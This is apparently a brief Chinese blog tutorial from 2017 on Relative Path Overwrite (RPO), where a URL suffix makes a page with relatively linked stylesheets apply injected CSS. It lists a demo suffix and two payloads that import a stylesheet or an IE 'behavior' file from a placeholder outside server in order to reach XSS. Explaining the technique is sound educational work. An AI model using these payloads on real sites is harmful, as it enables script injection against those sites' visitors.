XSS：RPO（Relative Path Overwrite）攻击

31 8 月, 2017 5826点热度 1人点赞 0条评论

0x00

RPO攻击首先利用的是通过相对路径引入的CSS，如

<link href="styles.css" rel="stylesheet" type="text/css" />

当我们在URL最后添加

/%0a{}*{background:red;}/

的时候会发现页面执行了我们的css代码。
通过这点，我们可以做到任意加载服务器上的文件。
假若我们能控制某些文件就可以达到XSS的目的。

几个Payload：

/%0a{}@import url("http://server/style.css")/
/%0a{}img{behavior:url(http://server/test.png);}/

本作品采用知识共享署名-非商业性使用-相同方式共享 4.0 国际许可协议进行许可